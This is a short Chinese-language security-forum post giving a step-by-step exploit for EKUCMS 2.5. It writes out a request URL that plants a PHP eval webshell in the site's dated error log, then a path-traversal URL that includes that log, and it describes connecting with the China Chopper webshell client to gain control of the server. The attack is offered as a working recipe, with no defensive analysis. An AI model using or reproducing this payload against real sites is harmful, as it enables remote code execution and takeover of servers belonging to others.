K8安全团队
查看: 1524|回复: 0

易酷cms本地包含漏洞拿shell

[复制链接]
  • TA的每日心情
    开心
    2017-6-13 17:07
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2017-12-5 11:14:38 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    测试版本:易酷cms2.5
    包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}
    1242616-20171202153416683-754556940.png
    会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日
    1242616-20171202153954542-1151873754.png
    错误日志内容
    1242616-20171202155253933-966595551.png
    包含错误日志,地址:http://localhost/ekucms2.5/?s=my/show/id/..        emplogs_12_02.log
    1242616-20171202155020448-433640321.png
    直接用菜刀连接
    1242616-20171202155516839-1475523286.png
    连接成功
    1242616-20171202155826292-1952150069.png

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    Powered by Discuz! X3.2 © 2001-2016 Comsenz Inc.

    返回顶部